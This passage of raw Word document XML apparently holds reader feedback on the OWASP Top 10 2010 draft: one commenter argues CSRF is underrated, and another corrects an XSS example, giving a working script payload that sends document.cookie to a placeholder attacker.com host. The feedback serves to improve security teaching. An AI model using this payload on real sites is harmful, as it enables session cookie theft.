        <w:t xml:space="preserve">). Other Severity Metrics have been issued for CSRF vulnerabilities that result in remote code execution with root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>privileges(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.kb.cert.org/vuls/id/584089" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>http://www.kb.cert.org/vuls/id/584089</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>) . As well as compromise of a root certificate which will completely undermine a Public Key Infrastructure (</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.kb.cert.org/vuls/id/264385</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">Both the Motorola and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities are from my research, Michael Brooks ;) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The reason why the Motorola vulnerability given such a high score is because it disrupts a large part of the internet infrastructure.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">   CSRF has the unique ability to access restricted network resources to deliver devastating attacks.   CSRF can extend attackers abilities and go to places where nothing else can.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I encourage you to look over the severity metric list. I can't find a single severity metric assigned to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in this category: "A3 –Broken Authentication and Session Management".   I don't think you'll ever find an A3 vulnerability that will be given a severity metric of 13.50 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.kb.cert.org/vuls/id/643049</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).    Also as an active security researcher I can tell you from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>first hand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> experience that there is a lot more CSRF in the wild than </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Broken</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authentication. (</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.milw0rm.com/author/677</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Thanks,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
      <w:r>
        <w:t>Michael Brooks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0217" w:rsidRDefault="00BC0217" w:rsidP="00BC0217">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="00F90983" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fabrizio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Accatino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>Hello Dave,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>A small feedback about </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t xml:space="preserve">Page 9: I'm not a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> expert but the example seems wrong to me.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>'&gt;&lt;script&gt;document.location='</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.attacker.com/cgi-bin/cookie.cgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>?'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%20</w:t>
      </w:r>
      <w:r>
        <w:t>+document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&lt;/script&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>Why %20?   I tried it and it does not work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>This works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>'&gt;&lt;script&gt;document.location='</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.attacker.com/cgi-bin/cookie.cgi?'+document.cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&lt;/script&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:r>
        <w:t>Best regards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F90983" w:rsidRDefault="00F90983" w:rsidP="00F90983">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fabrizio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0020677A" w:rsidRDefault="00F24D01" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TBD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE"/>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE"/>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE"/>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE"/>
    <w:p w:rsidR="009967C9" w:rsidRDefault="009967C9"/>
    <w:p w:rsidR="009967C9" w:rsidRDefault="009967C9"/>
    <w:sectPr w:rsidR="009967C9" w:rsidSect="00412B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A69AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86D63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622055"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11F67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D40AA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D84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717F91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86D63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967C9"/>
    <w:rsid w:val="0002537F"/>
    <w:rsid w:val="002022AF"/>
    <w:rsid w:val="0020677A"/>
    <w:rsid w:val="002E568B"/>
    <w:rsid w:val="003D6909"/>
    <w:rsid w:val="00412B5E"/>
    <w:rsid w:val="004C266D"/>
    <w:rsid w:val="005671A7"/>
    <w:rsid w:val="00620578"/>
    <w:rsid w:val="00662E80"/>
    <w:rsid w:val="00744367"/>
    <w:rsid w:val="007A7C26"/>
    <w:rsid w:val="007B2E45"/>
    <w:rsid w:val="007C015D"/>
    <w:rsid w:val="009967C9"/>
    <w:rsid w:val="009C2FFD"/>
    <w:rsid w:val="009D3DF1"/>
    <w:rsid w:val="00AD7069"/>
    <w:rsid w:val="00B4685B"/>
    <w:rsid w:val="00B74323"/>
    <w:rsid w:val="00BA5B8E"/>
    <w:rsid w:val="00BC0217"/>
    <w:rsid w:val="00C03D5B"/>
    <w:rsid w:val="00C0677B"/>
    <w:rsid w:val="00C307E9"/>
    <w:rsid w:val="00C45ADB"/>
    <w:rsid w:val="00C914CE"/>
    <w:rsid w:val="00DD1108"/>
    <w:rsid w:val="00F24D01"/>
    <w:rsid w:val="00F90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B5E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009C2FFD"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009C2FFD"/>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qFormat/>
    <w:rsid w:val="009C2FFD"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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37F"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C914CE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00620578"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B4685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685B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B4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B4685B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009C2FFD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="009C2FFD"/>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9C2FFD"/>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13641648">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="179130750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="209999681">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="249854448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="289169474">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="432365060">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="522520882">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="749886111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="755903691">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="945621600">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="72"/>
      <w:marRight w:val="72"/>
      <w:marTop w:val="72"/>
      <w:marBottom w:val="72"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="438109059">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1388411274">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1347170708">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="512189523">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1570380511">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="409470370">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="595943098">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="606160932">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1017391537">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2041012048">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="894121865">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="746027928">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="719282768">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1168206613">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="879704378">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1813717356">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="731274630">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2058888588">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1869026359">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
